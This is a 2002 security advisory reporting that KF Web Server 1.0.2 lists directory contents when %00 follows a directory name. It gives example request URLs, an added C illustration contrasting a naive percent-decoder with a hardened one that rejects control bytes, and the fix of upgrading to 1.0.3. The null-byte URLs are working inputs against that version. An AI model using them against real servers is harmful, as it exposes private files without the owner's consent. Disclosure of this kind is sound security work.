
KF Web Server shows file and directory content
8th Jul 2002 [SBWID-5515]

	KF Web Server version 1.0.2


	Thanks to Arnaud Jacques aka scrap [] [] message:

	If the requested URL contains a %00 after a directory name, then the
	server shows all files in the directory content. A hacker can see all
	hidden (non-HTML linked) files and directories on the server.

	 .oO  Exploit Oo.


	The exploit is really easy. You can do it with any browser. Examples:

	http://server_name/index.html : Normal use.

	http://server_name/%00 : You get the vulnerability.

	http://server_name/index.html%00 : Is *not* vulnerable.

	http://server_name/%00index.html : You get the vulnerability. In fact everything after %00 is ignored.

	http://server_name/subdir/%00 : You get the vulnerability.
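	The following C program is an added illustration and is not part of the original message or of KF Web Server's source (which is not available here). It models the mechanism the examples above point at: a percent-decoder that writes into a NUL-terminated buffer turns %00 into a string terminator, so the path the filesystem layer sees is cut off at that point, while the hardened decoder beside it refuses any request that would decode to a control byte. The rule that a target ending in '/' produces a directory listing is an assumption taken from the advisory's examples, not from the server's code; the five URLs are the ones listed above.

```c
#include <stdio.h>
#include <string.h>

/* Added illustration, not KF Web Server's code: a model of how "%00" in a
 * URL becomes a real NUL byte inside a C string and truncates the path. */

static int hexval(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode %XX escapes from url into out (capacity outsz).
 * Returns the number of bytes produced, or -1 if the buffer is too small or
 * reject_ctl is set and a control byte (0x00-0x1f, NUL included) would be emitted. */
static int percent_decode(const char *url, char *out, size_t outsz, int reject_ctl) {
    size_t n = 0;
    for (size_t i = 0; url[i] != '\0'; i++) {
        unsigned char b = (unsigned char)url[i];
        if (b == '%') {
            int hi = hexval(url[i + 1]);
            int lo = hi < 0 ? -1 : hexval(url[i + 2]);   /* never reads past the terminator */
            if (lo >= 0) { b = (unsigned char)(hi * 16 + lo); i += 2; }
        }
        if (reject_ctl && b < 0x20) return -1;
        if (n + 1 >= outsz) return -1;   /* keep room for the terminator */
        out[n++] = (char)b;
    }
    out[n] = '\0';
    return (int)n;
}

/* Vulnerable model: decode without checks and hand the C string on.
 * Every string function after this point stops at the decoded %00, so the
 * bytes that followed it in the URL are simply gone. */
const char *naive_target(const char *url) {
    static char buf[256];
    if (percent_decode(url, buf, sizeof buf, 0) < 0) return "";
    return buf;
}

/* Hardened model: reject the request (the caller would answer 400) if
 * decoding would produce a control byte. Ordinary escapes like %20 still work. */
const char *strict_target(const char *url) {
    static char buf[256];
    if (percent_decode(url, buf, sizeof buf, 1) < 0) return NULL;
    return buf;
}

/* Assumption drawn from the advisory's examples: a decoded target that ends
 * in '/' is treated as a directory request and gets a listing. */
int lists_directory(const char *target) {
    size_t n = strlen(target);
    return n > 0 && target[n - 1] == '/';
}

int main(void) {
    /* The five request paths from the advisory. */
    const char *urls[] = { "/index.html", "/%00", "/index.html%00",
                           "/%00index.html", "/subdir/%00" };
    for (size_t i = 0; i < sizeof urls / sizeof urls[0]; i++) {
        const char *t = naive_target(urls[i]);
        const char *s = strict_target(urls[i]);
        printf("%-16s naive -> %-12s (%s) | strict -> %s\n", urls[i], t,
               lists_directory(t) ? "directory listing" : "file",
               s ? s : "400 Bad Request");
    }
    return 0;
}
```

	The model also explains why http://server_name/index.html%00 is listed as not vulnerable: the NUL lands after a complete file name, so the truncated path still resolves to the file. A decoder that refuses control bytes, as strict_target does, closes the whole class rather than this one URL shape.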



	Upgrade to KF Web Server version 1.0.3

